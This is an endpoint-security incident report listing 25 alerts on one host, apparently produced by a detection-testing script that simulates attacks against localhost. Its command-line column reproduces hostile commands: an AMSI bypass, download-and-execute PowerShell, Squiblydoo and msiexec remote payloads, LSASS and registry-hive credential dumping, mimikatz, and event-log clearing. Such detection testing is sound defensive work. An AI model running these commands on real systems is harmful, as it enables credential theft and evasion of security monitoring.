Incident Overview

Incident ID CINC-20251221-5F0B9576
Severity Critical (90)
Status new
Alert Count 25
Host Count 1

Timeline

First Seen 2025-12-22 04:05:35
Last Seen 2025-12-22 04:07:48
Duration 0d 0h 2m
Created 2025-12-22 08:36
Updated 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics: Defense Evasion, AI Powered IOA, Execution, Credential Access, Persistence
Techniques: Indicator Removal, Command and Scripting Interpreter, User Execution, OS Credential Dumping, Event Triggered Execution, PowerShell, Regsvr32, Rundll32

Affected Hosts (1)

TEAHEE

Related Alerts (25)

Severity | Status | Hostname | Description | Tactic | Command Line | Time
High | new | TEAHEE | A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. | Defense Evasion | wevtutil cl Security | 12-22 04:07
High | new | TEAHEE | A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. | Defense Evasion | wevtutil cl Security | 12-22 04:07
High | new | TEAHEE | A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-22 04:07
High | new | TEAHEE | A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. | Defense Evasion | wevtutil cl Security | 12-22 04:06
Informational | new | TEAHEE | A process has written a known EICAR test file. Review the files written by the triggered process. | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-22 04:06
Critical | new | TEAHEE | A process saved the Security Account Manager (SAM) or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. | Credential Access | reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv | 12-22 04:06
Critical | new | TEAHEE | A process saved the Security Account Manager (SAM) or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. | Credential Access | reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv | 12-22 04:06
High | new | TEAHEE | A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. | Defense Evasion | wevtutil cl Security | 12-22 04:06
High | new | TEAHEE | A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. | Defense Evasion | wevtutil cl Security | 12-22 04:06
High | new | TEAHEE | A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. | Defense Evasion | wevtutil cl Security | 12-22 04:06
High | new | TEAHEE | A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-22 04:06
High | new | TEAHEE | Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 04:06
High | new | TEAHEE | A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-22 04:06
High | new | TEAHEE | A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-22 04:06
High | new | TEAHEE | A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. | Execution | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-22 04:06
High | new | TEAHEE | A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line. | Execution | C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" | 12-22 04:06
High | new | TEAHEE | Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 04:06
High | new | TEAHEE | Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 04:06
High | new | TEAHEE | Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 04:06
High | new | TEAHEE | A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a COM object. Review the script passed to scrobj.dll on the command line. | Defense Evasion | regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll | 12-22 04:06
High | new | TEAHEE | A process appears to be launching mimikatz, a password dumping utility. mimikatz's primary purpose is to steal passwords. If credentials were dumped, change your passwords and investigate further. | Credential Access | C:\WINDOWS\system32\cmd.exe /c "powershell sekurlsa::logonpasswords" | 12-22 04:06
High | new | TEAHEE | Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. | Defense Evasion | rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full | 12-22 04:06
Critical | new | TEAHEE | A process appears to be accessing credentials and might be dumping passwords. If this is unexpected, review the process tree. | Credential Access | rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full | 12-22 04:06
High | new | TEAHEE | Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. | Defense Evasion | C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full" | 12-22 04:06
Informational | new | TEAHEE | A process has written a known EICAR test file. Review the files written by the triggered process. | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-22 04:05